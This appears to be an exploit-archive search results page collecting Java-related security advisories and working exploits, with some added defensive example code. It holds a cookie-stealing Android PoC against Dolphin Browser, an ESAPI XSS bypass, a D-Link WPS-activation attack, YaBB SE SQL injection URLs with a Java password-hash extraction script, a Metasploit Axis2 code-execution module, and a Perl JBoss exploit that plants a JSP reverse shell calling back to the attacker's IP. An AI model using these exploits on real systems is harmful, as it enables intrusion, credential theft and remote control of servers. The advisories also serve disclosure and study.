Java
Search result for 'Java'
Yair Amit/Dolphin Browser HD Cross Application Scripting ( na)
1 Background
============
Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, the Dolphin browser application holds sensitive
information such as cookies, cache and history, and this cannot be accessed
by third-party apps. An Android app may request specific privileges during
its installation; if granted by the user, the app's capabilities are extended.
Intents are used by Android apps for intercommunication. These objects can be
broadcast, passed to the startActivity call (when an application starts another
activity), or passed to the startService call (when an application starts a
service). Normally, when startActivity is called, the target activity's
onCreate method is executed. However, under AndroidManifest.xml it is possible
to define different launch tags, which affect this behavior. One example is the
singleTask launch tag, which makes the activity act as a singleton. This affects
the startActivity call: if the activity has already been started when the call
is made, the activity's onNewIntent member function is called instead of its
onCreate method.
2 Vulnerability
===============
A third-party application may exploit Dolphin Browser HD's URL loading process in
order to inject JavaScript code into an arbitrary domain, and thus break Android's
sandboxing. This can be done by sending two consecutive startActivity calls. The
first call includes the attacked domain, and causes Dolphin Browser HD to load
it, while the second call contains JavaScript code. The JavaScript URI will be
opened under the current tab, i.e. the attacked domain.
3 Impact
========
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.
4 Proof-of-Concept
==================
The following is a PoC for the second technique:

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
    // Dolphin Browser HD's package and its browser activity (the singleTask target)
    static final String mPackage = "mobi.mgeek.TunnyBrowser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    // Delay between the two startActivity calls, giving the page time to load
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // First call: the browser loads the attacked domain in the current tab
        startBrowserActivity(mUrl);
        try {
            Thread.sleep(mSleep);
        }
        catch (InterruptedException e) {}
        // Second call: the activity already exists, so onNewIntent receives the
        // javascript: URI and it is opened under the current tab, i.e. the attacked domain
        startBrowserActivity("javascript:" + mJavascript);
    }

    // Explicit VIEW intent addressed directly to the browser activity
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
5 Vulnerable versions
=====================
Dolphin Browser HD 6.0.0 has been found vulnerable.
6 Vendor Response
=================
Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates
a fix for this bug.
8 Credit
========
* Roee Hay <roeeh@il.ibm.com>
* Yair Amit <yairam@gmail.com>
9 References
============
* Original advisory: http://blog.watchfire.com/files/advisory-dolphin.pdf
* Blog post:
http://blog.watchfire.com/wfblog/2011/09/dolphin-browser-hd-cross-application-scripting.html
* Demo of the PoC: http://youtu.be/1E0GzZPdpLM
* Android Browser Cross-Application Scripting (CVE-2011-2357):
http://blog.watchfire.com/files/advisory-android-browser.pdf
10 Acknowledgments
==================
We would like to thank the Dolphin Browser team for the efficient and quick way
in which it handled this security issue.
Dolphin Browser HD versions prior to 6.1.0 suffer from a cross-application scripting vulnerability.
Inferno from Secure Thoughts/OWASP ESAPI XSS Bypass ( na)
Bypassing OWASP ESAPI XSS Protection inside Javascript
------------------------------------------------------
By Inferno (inferno {at} securethoughts {dot} com)
Everyone knows the invaluable XSS cheat sheet maintained by "RSnake". It is
all about breaking things and features all the scenarios that can result in
XSS. To complement his efforts, there is an excellent XSS prevention cheat
sheet created by "Jeff Williams" (Founder and CEO, Aspect Security). As far
as I have seen, this wiki page provides the most comprehensive information
on protecting yourself from XSS on the internet. It advises using the OWASP
ESAPI API to mitigate any XSS arising from untrusted user input.
I was evaluating this ESAPI API and the recommendations given on the wiki to
see if there are any potential flaws. Any weakness impacts a very large
number of users since many developers are using it to strengthen their web
applications throughout the world. This is my way of contributing back to
the community, but can never match the immense efforts put by Jeff and other
OWASP team members in developing this library.
I want to give you a little bit of background before diving into the real
vulnerability. The XSS prevention cheat sheet classifies XSS protections by
dividing them into broadly four buckets: HTML body injection, HTML
attribute injection, JavaScript injection and CSS injection. For each of
these four buckets, there is an ESAPI function reference you can use for
output escaping/encoding.
If you allow any untrusted user input into the JavaScript functions
document.write() or eval(), it can still execute the XSS even after you do
the scrubbing using the ESAPI encodeForJavaScript() function. The reason
is that the hex-escaped characters have been converted back into normal
characters by the time these functions execute.
Here is the proof of concept JSP code:

<%@page import="org.owasp.esapi.*"%>

<%@page contentType="text/html" pageEncoding="UTF-8"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">

<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>ESAPI XSS Protection Bypass</title>
    </head>
    <body>
        <h1>ESAPI XSS Protection Bypass</h1>
        <p id="tb1"/><br>
        <p id="tb2"/>
        <script>
            // in a real scenario, these three strings come from request.getParameter or user input
            <%
                String vulstr1 = "-1';alert(0);";
                String vulstr2 = "<img src=x onerror=alert(1)>";
                String vulstr3 = "0,x setter=alert,x=2";
            %>

            // you can safely use it in places like this
            // Ex. vulstr1 is completely encapsulated in a and alert(0) is not executed.
            var a='<%= ESAPI.encoder().encodeForJavaScript(vulstr1) %>';
            alert(a);

            // However, you can bypass protection in places like these
            // Ex. vulstr2 gets written to html and alert(1) executes
            document.write("<%= ESAPI.encoder().encodeForJavaScript(vulstr2) %>");
            // Ex. part of vulstr3 gets assigned to u, the rest alert(2) executes
            eval("u=<%= ESAPI.encoder().encodeForJavaScript(vulstr3) %>");
        </script>
    </body>
</html>
Many thanks to Jeremiah Grossman and Jeff Williams for taking the time to
review my idea and providing their insights. Jeremiah told me that he has
seen such injections from time to time at WhiteHat and these do exist in the
wild.
Jeff confirmed that some documentation changes will fix this. I agree that
no ESAPI code change is required, because the functions themselves are not
insecure.
But, if you are currently using ESAPI functions inside your JavaScript code,
it is important that you re-review that code and the places where you make
calls to ESAPI functions.
If you use the ESAPI function encodeForJavaScript() inside document.write(),
it is advised that you replace it with the appropriate ESAPI function for the
context where the data ultimately lands. For example, if you have
document.write("<script>alert('XSS')</script>"), you know the data is landing
in HTML body context, so it is appropriate to wrap it in encodeForHTML().
Using user input inside eval() is less common, but more disastrous. The reason
is that you can still begin another command context using the , (comma) and
(space) characters, which are not encoded by encodeForHTML(). So it is better
to avoid putting user input inside eval() at all.
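The decoding step described above, as an added example that is not code from the original post or from ESAPI: the two encoders are simplified stand-ins for encodeForJavaScript() and encodeForHTML() (they ignore ESAPI's immune-character list), and the "sinks" only simulate what a browser's string-literal parser and document.write() would do with the result.

```javascript
// Added example, not code from the original post. The two encoders below are
// simplified stand-ins for ESAPI's encodeForJavaScript() and encodeForHTML(),
// written here to show why the first one alone is not enough once the encoded
// value flows into document.write() or eval().

// JS string-literal context: every non-alphanumeric becomes \xHH or \uHHHH
// (the shape of output encodeForJavaScript() produces; the immune-character
// details of the real ESAPI codec are omitted).
function encodeForJavaScript(s) {
  return s.replace(/[^A-Za-z0-9]/g, function (ch) {
    var cu = ch.charCodeAt(0);
    return cu < 0x100
      ? "\\x" + cu.toString(16).padStart(2, "0")
      : "\\u" + cu.toString(16).padStart(4, "0");
  });
}

// HTML body/attribute context: entity-encode the characters that can start
// markup or break out of an attribute.
function encodeForHTML(s) {
  var map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, function (ch) { return map[ch]; });
}

// What the browser does with "<%= encodeForJavaScript(x) %>" inside a <script>:
// the \xHH escapes are resolved when the string literal is parsed, so
// document.write()/eval() receive the original characters again.
function decodeAsJsStringLiteral(encoded) {
  // `encoded` contains only [A-Za-z0-9] and backslash escapes, so it cannot
  // terminate the literal; this mirrors the engine's parser, it is not a sink.
  return new Function('return "' + encoded + '";')();
}

// Stand-in for the HTML parser behind document.write(): would this markup
// create an element carrying an on* event-handler attribute?
function markupCreatesEventHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Vulnerable pattern from the post: document.write("<%= encodeForJavaScript(vulstr2) %>")
function vulnerableDocumentWrite(untrusted) {
  var markup = decodeAsJsStringLiteral(encodeForJavaScript(untrusted));
  return { markup: markup, executes: markupCreatesEventHandler(markup) };
}

// Hardened pattern: encode for the context the data finally lands in (HTML),
// then for the JS literal that carries it there.
function hardenedDocumentWrite(untrusted) {
  var markup = decodeAsJsStringLiteral(encodeForJavaScript(encodeForHTML(untrusted)));
  return { markup: markup, executes: markupCreatesEventHandler(markup) };
}

// eval("u=<%= encodeForJavaScript(vulstr3) %>"): the source text eval actually
// parses, showing that the , and = separators survive untouched.
function sourceSeenByEval(untrusted) {
  return "u=" + decodeAsJsStringLiteral(encodeForJavaScript(untrusted));
}

// The three strings from the PoC above
var vulstr1 = "-1';alert(0);";
var vulstr2 = "<img src=x onerror=alert(1)>";
var vulstr3 = "0,x setter=alert,x=2";

if (typeof require !== "undefined" && require.main === module) {
  console.log("literal context, vulstr1 decodes to:", decodeAsJsStringLiteral(encodeForJavaScript(vulstr1)));
  console.log("document.write, vulnerable:", vulnerableDocumentWrite(vulstr2));
  console.log("document.write, hardened:  ", hardenedDocumentWrite(vulstr2));
  console.log("eval sees:", sourceSeenByEval(vulstr3));
}
```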
Any more suggestions or discussion on fixes is highly welcome.
Thanks and Regards,
Inferno
Security Researcher
SecureThoughts.com
A bypass vulnerability exists against the cross site scripting protection in the OWASP ESAPI.
/D-Link CAPTCHA Bypass ( na)
D-Link Captcha Partially Broken
May 12th, 2009
Hack-A-Day reported on D-Link’s new captcha system designed to protect against malware that alters DNS settings by logging in to the router using default administrative credentials. I downloaded the new firmware onto our DIR-628 to take a look, and quickly found a flaw in the captcha authentication system that allows an attacker to glean your WiFi WPA pass phrase from the router with only user-level access, and without properly solving the captcha.
When you login with the captcha enabled, the request looks like this:
GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2
The hash is a salted MD5 hash of your password, the auth_code is the captcha value that you entered, and the auth_id is unique to the captcha image that you viewed (this presumably allows the router to check the auth_code against the proper captcha image). The problem is that if you leave off the auth_code and auth_id values, some pages in the D-Link Web interface think that you’ve properly authenticated, as long as you get the hash right:
GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a
Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:
GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0
When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and retrieve the WPA passphrase directly from the router.
Further, one need not log in with Administrative credentials to perform this attack; only User-level access is required to activate WPS. This means that even if you load the new firmware on your router, use a strong WPA pass phrase, and change your Administrative login, an attacker can still activate WPS and gain access to your wireless network by simply having an internal client view a Web page.
The attack works like this:
1. The attacker uses DNS load balancing to bypass the browser’s same-domain restrictions. This allows his JavaScript code to access the router’s index page and glean the salt generated by the router.
2. The attacker’s JavaScript uses the salt to generate a login hash for the D-Link User account (blank password by default).
3. The attacker’s JavaScript sends the hash to the post_login.xml page.
4. The attacker’s JavaScript sends a request to the wifisc_add_sta.xml page, activating WPS.
5. The attacker uses WPSpy to detect when the victim’s router is looking for WPS clients, and connects to the WiFi network using a WPS-capable network card.
So what you basically have is a combination of our previously described DNS load balancing and CSRF-based WPS attacks that results in a captcha bypass, privilege escalation, and a WPA crack, all with just a little JavaScript and some phishing.
A flaw in the D-Link CAPTCHA authentication system allows an attacker to glean your WiFi WPA pass phrase from the router with only user-level access, and without properly solving the CAPTCHA.
BaCkSpAcE/yabbSE.txt ( na)
Summary:
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board). An SQL Injection vulnerability in the product allows a
remote attacker to insert malicious SQL statements.
Details:
Vulnerable Systems:
YaBB SE version 1.5.4 (tested), 1.5.3 (tested), maybe others
Immune Systems:
YaBB SE version 1.5.5
Technical Details:
The file SSI.php has a number of functions that return some information
about the status of the forum, like recent topics, board statistics and so
on. The functions welcome and recentTopics are vulnerable to SQL injection
because the parameter ID_MEMBER is not checked against malicious input.
Example:
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
OR
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
Those requests return a page showing all usernames and hashed passwords:
[General Discussion] test post by test January 01, 2001, 03:00:01 pm
[] admin by [hashed pass] January 01, 1970, 01:00:01 am
[] test_user by [hashed pass] January 01, 1970, 01:00:02 am
http://vulnhost/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+,+0+FROM+yabbse_members+WHERE+ID_MEMBER=1/*
This request returns the value of the first character of the realName of
the user whose ID_MEMBER is 1.
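The defender's side of the ID_MEMBER flaw, as an added example that is not part of the original advisory: the input check SSI.php should have applied to ID_MEMBER, and a log-line classifier that flags requests shaped like the injection URLs quoted above (UNION SELECT plus a trailing comment opener). The access-log lines are constructed samples.

```javascript
// Added example, not part of the original advisory. Two defender-side pieces for
// the flaw described above: the input check SSI.php should have applied to
// ID_MEMBER, and a log-line classifier that flags requests shaped like the
// injection URLs shown above. The access-log lines are constructed samples.

// SSI.php uses ID_MEMBER as a numeric member id, so anything but a plain
// positive integer is refused before it can reach the query.
// Returns the id as a number, or null when the value must be rejected.
function parseMemberId(raw) {
  if (typeof raw !== "string" || !/^[1-9][0-9]{0,9}$/.test(raw)) return null;
  return Number(raw);
}

// Markers of the injection shape used against SSI.php: breaking out of the
// "(... lmr.ID_MEMBER=<id>)" parenthesis, appending UNION SELECT, and
// commenting out the remainder of the original query with /*.
var SQLI_MARKERS = [
  /\bOR\b\s+\d+\s*=\s*\d+\s*\)/i,
  /\bUNION\b\s+(?:ALL\s+)?SELECT\b/i,
  /\/\*\s*$/
];

// Decode a query-string component the way PHP does ('+' and %XX both mean
// the raw character); malformed escapes are left as-is rather than thrown on.
function decodeQueryValue(v) {
  try { return decodeURIComponent(v.replace(/\+/g, " ")); } catch (e) { return v; }
}

// Split "/path?a=1&b=2" into {a: "1", b: "2"}; only the first '=' separates
// key from value, so "ID_MEMBER=1 ... WHERE ID_MEMBER=1/*" stays one value.
function parseQuery(path) {
  var params = {};
  var query = path.split("?")[1] || "";
  query.split("&").forEach(function (kv) {
    if (kv === "") return;
    var i = kv.indexOf("=");
    var k = decodeQueryValue(i < 0 ? kv : kv.slice(0, i));
    params[k] = decodeQueryValue(i < 0 ? "" : kv.slice(i + 1));
  });
  return params;
}

// Classify one request path: is ID_MEMBER a valid id, and how many injection
// markers does its value carry?
function classifyRequest(path) {
  var id = parseQuery(path).ID_MEMBER;
  if (id === undefined) return { idPresent: false, idValid: true, markers: 0 };
  var markers = SQLI_MARKERS.filter(function (re) { return re.test(id); }).length;
  return { idPresent: true, idValid: parseMemberId(id) !== null, markers: markers };
}

// Walk Common Log Format lines and report the ones aimed at SSI.php with a
// malformed ID_MEMBER (line numbers are 1-based).
function findSqliInLog(lines) {
  var findings = [];
  lines.forEach(function (line, n) {
    var m = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m || m[1].indexOf("SSI.php") < 0) return;
    var c = classifyRequest(m[1]);
    if (c.idPresent && (!c.idValid || c.markers > 0)) {
      findings.push({ line: n + 1, markers: c.markers });
    }
  });
  return findings;
}

// Constructed sample log: one legitimate recentTopics call, then the two
// injection requests quoted in the advisory.
var SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2001:15:00:01 +0000] "GET /yabbse/SSI.php?function=recentTopics&ID_MEMBER=1 HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2001:15:00:02 +0000] "GET /yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/* HTTP/1.1" 200 2048',
  '10.0.0.9 - - [01/Jan/2001:15:00:03 +0000] "GET /yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(realName,1,1)%20)%20,%200%20FROM%20yabbse_members%20WHERE%20ID_MEMBER=1/* HTTP/1.1" 200 390'
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(findSqliInLog(SAMPLE_LOG));
}
```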
Proof of concept code:
/*
 * YabbSe SQL Injection test code
 * The code is very ugly but it works OK
 * Use at your own risk.
 * compile:
 * javac yabb.java
 * exec:
 * java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
 * parameters are:
 * java yabb [url with path] [database_prefix] [ID_MEMBER]
 */
import java.net.*;
import java.io.*;

public class yabb {
    public static void main(String[] args) throws Exception {
        String Key = "";
        // The passwd hash is 32 characters long and the injected query leaks one
        // ASCII value per request, so one request is made per character.
        for (int count = 1; count <= 32; count++) {
            // Same injection as the welcome example above, with SUBSTRING(passwd, count, 1)
            URL yabbForum = new URL(args[0]
                + "SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP"
                + "%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd," + count + ",1)%20)%20"
                + "%20,%20%200%20FROM%20" + args[1] + "members%20WHERE%20ID_MEMBER=" + args[2] + "/*");
            BufferedReader in = new BufferedReader(new InputStreamReader(yabbForum.openStream()));
            // The leaked number appears on the first line of the response, after "action=im"
            String inputLine = in.readLine();
            int pos = (inputLine == null) ? -1 : inputLine.indexOf("action=im");
            if (pos < 0) {
                System.out.println("ERROR: The server doesn't return any data");
                System.exit(0);
            }
            int pos2 = inputLine.indexOf(" ", pos + 11);
            String theNumber = inputLine.substring(pos + 11, pos2);
            System.out.println(theNumber + "-" + new Character((char) Integer.parseInt(theNumber.trim())).toString());
            Key += new Character((char) Integer.parseInt(theNumber.trim())).toString();
            in.close();
        }
        System.out.println("Hashed password : " + Key);
    }
}
Vendor status:
The vendor was contacted and the vulnerabilities were fixed.
Solution:
Upgrade to version 1.5.5
Credits:
Credits go to BackSpace
YaBB SE versions 1.54 and 1.53 have the functions welcome and recentTopics which are vulnerable to SQL injection because the parameter ID_MEMBER is not checked against malicious input.
metasploit/Axis2 Authenticated Code Execution (via REST) ( multiple)
##
# $Id: axis2_deployer_rest.rb 11330 2010-12-14 17:26:44Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Axis2 Authenticated Code Execution (via REST)',
      'Version'        => '$Revision: 11330 $',
      'Description'    => %q{
          This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
        and uploads and executes commands via deploying a malicious web service by using REST.
      },
      'References'     =>
        [
          # General
          [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
          [ 'CVE', '2010-0219' ],
        ],
      'Platform'       => [ 'java', 'win', 'linux' ], # others?
      'Targets'        =>
        [
          [ 'Java', {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ],
          #
          # Platform specific targets only
          #
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            },
          ],
          [ 'Linux X86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
        ],
      'Author'         => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
        OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
      ], self.class)
    register_autofilter_ports([ 8080 ])
  end

  def upload_exec(session)
    contents=''
    name = Rex::Text.rand_text_alpha(8)
    services_xml = %Q{
<service name="#{name}" scope="application">
  <description>
    #{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
  </description>
  <messageReceivers>
    <messageReceiver
      mep="http://www.w3.org/2004/08/wsdl/in-only"
      class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
    <messageReceiver
      mep="http://www.w3.org/2004/08/wsdl/in-out"
      class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
  </messageReceivers>
  <parameter name="ServiceClass">
    metasploit.PayloadServlet
  </parameter>
</service>
}

    if target.name =~ /Java/
      zip = payload.encoded_jar
      zip.add_file("META-INF/services.xml", services_xml)
      # We need this class as a wrapper to run in a thread. For some reason
      # the Payload class is giving illegal access exceptions without it.
      path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
      fd = File.open(path, "rb")
      servlet = fd.read(fd.stat.size)
      fd.close
      zip.add_file("metasploit/PayloadServlet.class", servlet)
      contents = zip.pack
    else
    end

    boundary = rand_text_alphanumeric(6)
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
    data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
    data << contents
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri'     => "/#{datastore['PATH']}/axis2-admin/upload",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
        {
          'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
          'Content-Length' => data.length,
          'Cookie'         => "JSESSIONID=#{session}",
        }
    }, 25)

    if (res and res.code == 200)
      print_status("Successfully uploaded")
    else
      print_error("Error uploading #{res}")
      return
    end

=begin
    res = send_request_raw({
      'uri'     => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
      'method'  => 'GET',
      'headers' =>
        {
          'Cookie' => "JSESSIONID=#{session}",
        }
    }, 25)
    puts res.body
    puts res.code
    if res.code > 200 and res.code < 300
      if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
        dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
        puts dir
      else
        if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
          dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
          puts dir
        end
      end
    end
=end

    print_status("Polling to see if the service is ready")

    # Try to execute the payload
    1.upto 5 do
      Rex::ThreadSafe.sleep(3)
      res = send_request_raw({
        'uri'     => "/#{datastore['PATH']}/services/#{name}/run",
        'method'  => 'GET',
        'headers' =>
          {
            'Cookie' => "JSESSIONID=#{session}",
          }
      }, 25)
      if res.code >= 200 and res.code < 300
        # This should usually mean we got a shell
        break
      end
    end
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    path = datastore['PATH']

    success = false
    srvhdr = '?'
    begin
      res = send_request_cgi(
        {
          'method' => 'POST',
          'uri'    => "/#{path}/axis2-admin/login",
          'ctype'  => 'application/x-www-form-urlencoded',
          'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
        }, 25)

      if not (res.kind_of? Rex::Proto::Http::Response)
        raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
      end
      if res.code == 404
        raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
      end

      srvhdr = res.headers['Server']
      if res.code == 200
        # Could go with res.headers["Server"] =~ /Apache-Coyote/i
        # as well but that seems like an element someone's more
        # likely to change
        success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
        if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
          session = $1
        end
      end
    rescue ::Rex::ConnectionError
      print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
    end

    if success
      print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
      upload_exec(session)
    else
      print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
    end
  end
end
Kingcope/JBoss Application Server Remote Exploit ( jsp)
#JBoss AS Remote Exploit
#by Kingcope
#####
use IO::Socket;
use LWP::UserAgent;
use URI::Escape;
use MIME::Base64;

sub usage {
    print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl <target> <targetport> <yourip> <yourport> <win/lnx>\n";
    print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
    exit;
}

if ($#ARGV != 4) { usage; }

$host   = $ARGV[0];
$port   = $ARGV[1];
$myip   = $ARGV[2];
$myport = $ARGV[3];
$com    = $ARGV[4];

if ($com eq "lnx") {
    $comspec = "/bin/sh";
}
if ($com eq "win") {
    $comspec = "cmd.exe";
}

$|=1;

$jsp="
<%@
page import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"
%>
<%!
static class StreamConnector extends Thread
{
    InputStream is;
    OutputStream os;

    StreamConnector( InputStream is, OutputStream os )
    {
        this.is = is;
        this.os = os;
    }

    public void run()
    {
        BufferedReader in  = null;
        BufferedWriter out = null;
        try
        {
            in  = new BufferedReader( new InputStreamReader( this.is ) );
            out = new BufferedWriter( new OutputStreamWriter( this.os ) );
            char buffer[] = new char[8192];
            int length;
            while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
            {
                out.write( buffer, 0, length );
                out.flush();
            }
        } catch( Exception e ){}
        try
        {
            if( in != null )
                in.close();
            if( out != null )
                out.close();
        } catch( Exception e ){}
    }
}
%>
<%
try
{
    Socket socket = new Socket( \"$myip\", $myport );
    Process process = Runtime.getRuntime().exec( \"$comspec\" );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>";

#print $jsp;exit;

srand(time());

sub randstr
{
    my $length_of_randomstring=shift;# the length of
    # the random string to generate

    my @chars=('a'..'z','A'..'Z','0'..'9','_');
    my $random_string;
    foreach (1..$length_of_randomstring)
    {
        # rand @chars will generate a random
        # number between 0 and scalar @chars
        $random_string.=$chars[rand @chars];
    }
    return $random_string;
}

$appbase = randstr(8);
$jspname = randstr(8);

print "APPBASE=$appbase\nJSPNAME=$jspname\n";

$bsh_script =
qq{import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "} . encode_base64($jsp, "") . qq{";

BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/} . $appbase . ".war" . qq{").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String jsp_file = jboss_home + "/deploy/} . $appbase . ".war/" . $jspname . ".jsp" . qq{";
FileOutputStream fstream = new FileOutputStream(jsp_file);
fstream.write(byteval);
fstream.close(); };

#
# UPLOAD
#
$params = 'action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=' . uri_escape($bsh_script) . '&argType=java.lang.String&arg1=' . randstr(8) . '.bsh';

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");

my $req = HTTP::Request->new(POST => "http://$host:$port/jmx-console/HtmlAdaptor");
$req->content_type('application/x-www-form-urlencoded');
$req->content($params);

print "UPLOAD... ";
my $res = $ua->request($req);

if ($res->is_success) {
    print "SUCCESS\n";
    print "EXECUTE";
    sleep(5);
    $uri = '/' . $appbase . '/' . $jspname . '.jsp';
    for ($k=0;$k<10;$k++) {
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
        my $req = HTTP::Request->new(GET => "http://$host:$port$uri");
        my $res = $ua->request($req);
        if ($res->is_success) {
            print "\nSUCCESS\n";
            exit;
        } else {
            print ".";
            # print $res->status_line."\n";
            sleep(5);
        }
    }
    print "UNSUCCESSFUL\n";
}
else {
    print "UNSUCCESSFUL\n";
    print $res->status_line, "\n";
    exit;
}
